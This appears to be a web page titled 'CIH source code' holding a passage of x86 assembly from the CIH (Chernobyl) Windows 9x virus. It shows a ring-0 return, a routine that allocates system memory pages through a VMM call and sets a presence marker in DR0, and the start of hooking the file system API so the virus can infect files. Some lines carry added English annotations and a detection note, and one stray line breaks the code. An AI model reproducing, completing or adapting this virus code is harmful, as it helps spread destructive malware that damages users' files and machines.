CIH源代码


本文详细介绍CIH源代码

  ExitRing0Init:
mov [ebx-04h], bp ;
shr ebp, 16 ; Restore Exception
mov [ebx+02h], bp ;

  iretd

  ; *************************************
; * Allocate SystemMemory Page to Use *
; *************************************

  ; -------------------------------------------------------------------
  ; AllocateSystemMemoryPage  (ring-0 path, Windows 9x VMM/VxD world)
  ; Requests two system pages from the VMM through the int 20h
  ; dynamic-link stub, keeps the returned address in EDI, and leaves
  ; ring 0 with iretd (the interrupt frame it returns through is set
  ; up outside this fragment).
  ; In:   ebx = value written to DR0 as the "already resident" marker
  ;       ecx = reused for several argument slots; set before entry,
  ;             presumably 0 — not visible in this fragment
  ;       esi = base register for relative references (MyVirusStart-@2)
  ; Out:  edi = start address of the allocated system memory
  ;       eax = address handed back to the ring-3 code via iretd
  ; Clob: eax, ecx, edx, flags (per the service's own note below);
  ;       esp is rebalanced after the 8-dword argument frame
  ; Detection note: a populated DR0 with no debugger attached is the
  ; in-memory indicator this routine leaves behind.
  ; -------------------------------------------------------------------
  AllocateSystemMemoryPage:

  mov dr0, ebx ; Set the Mark of My Virus Exist in System (DR0 = presence marker)

  push 00000000fh ; flags     = 0Fh (low four PAGE* flag bits — verify against vmm.inc)
push ecx ; PhysAddr
push 0ffffffffh ; maxPhys   = no upper physical bound
push ecx ; minPhys
push ecx ; AlignMask
push ecx ; VM
push 000000001h ; pType     = 1 (PG_SYS)
push 000000002h ; nPages    = 2
int 20h ; VMMCALL _PageAllocate (int 20h + service-ID dword = VxD dynamic-link call)
_PageAllocate = $ ; label the service-ID dword so it can be referenced elsewhere
dd 00010053h ; Use EAX, ECX, EDX, and flags (device 0001h = VMM, service 0053h)
add esp, 08h*04h ; caller pops the 8 dword arguments (C-style VMM service)

  xchg edi, eax ; EDI = SystemMemory Start Address (eax held the service's return value)

  lea eax, MyVirusStart-@2[esi] ; eax = MyVirusStart located relative to esi (both labels outside this fragment)

  iretd ; Return to Ring3 Initial Program

  ; *************************************
; * Install My File System Api Hook *
; *************************************

  InstallMyFileSystemApiHook:

  lea eax, FileSystemApiHook-@6[edi]

  push eax ;
int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook = $ ;
dd 00400067h ; Use EAX, ECX, EDX, and flags

  mov dr0, eax ; Save OldFileSystemApiHook Add
ss

  pop eax ; EAX = FileSystemApiHook Address

  ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
mov edx, [ecx]
mov OldInstallFileSystemApiHook-@3[eax], edx

